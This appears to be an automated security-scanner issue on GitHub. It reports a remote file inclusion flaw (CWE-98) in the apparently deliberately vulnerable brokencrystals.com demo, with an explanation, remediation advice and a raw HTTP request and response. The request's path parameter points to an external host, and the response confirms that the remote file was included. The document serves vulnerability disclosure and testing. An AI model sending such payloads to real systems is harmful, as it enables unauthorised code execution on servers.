Skip to content

Remote File Inclusion #8

Description

@bright-security

Remote File Inclusion

Severity: High Discovered: 10 of August-2022, 02:20 PM

CWE ID

CWE-98

CVSS

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L

Details

A file inclusion vulnerability is a type of vulnerability that is most commonly found to affect web applications that rely on a scripting run time. This issue is caused when an application builds a path to executable code using an attacker-controlled variable in a way that allows the attacker to control which file is executed at run time. A file include vulnerability is distinct from a generic Directory Traversal Attack, in that directory traversal is a way of gaining unauthorized file system access, and a file inclusion vulnerability subverts how an application loads code for execution. Successful exploitation of a file include vulnerability will result in remote code execution on the web server that runs the affected web application.

Possible exposure

Execute Unauthorized Code or Commands

Remediation suggestions

When validating filenames, use stringent whitelist that limit the character set to be used. If feasible, only allow a single '.' character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as '/' to avoid CWE-36. Use a whitelist of allowable file extensions, which will help to avoid CWE-434. Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a blacklist, which may be incomplete (CWE-184). For example, filtering '/' is insufficient protection if the filesystem also supports the use of '' as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if '../' sequences are removed from the '.../...//' string in a sequential fashion, two instances of '../' would be removed from the original string, but the remaining characters would still form the '../' string.

Request

GET https://brokencrystals.com/api/file?path=http%3A%2F%2Ffiledealer.nexploit.app%2Frfi.md5.txt&type=image%2Fjpg HTTP/1.1
Referer: https://brokencrystals.com/api/file?path=config/products/crystals/amethyst.jpg&type=image/jpg
Cookie: connect.sid=WLsxvkvPswEGBPGcdFR_x06CDl0wpOnF.KIzhCcIs4f%2F82N%2FlJX%2FvT%2ByuttAcjHVYFU%2FrYiICLQk; bc-calls-counter=1660141219921
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept-Encoding: identity

Response

HTTP/1.1 200
Server: nginx/1.19.8
Date: Wed, 10 Aug 2022 14:20:20 GMT
Content-Type: image/jpg
Connection: keep-alive
vary: Origin
access-control-allow-origin: *
x-xss-protection: 0
strict-transport-security: max-age=0
x-content-type-options: 1
content-security-policy: default-src  * 'unsafe-inline' 'unsafe-eval'
set-cookie: bc-calls-counter=1660141220259
Content-Length: 32
Cache-Control: public, max-age=99999

245cc0a508bf7f0ff754c84c0fe0b5bc

External links

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions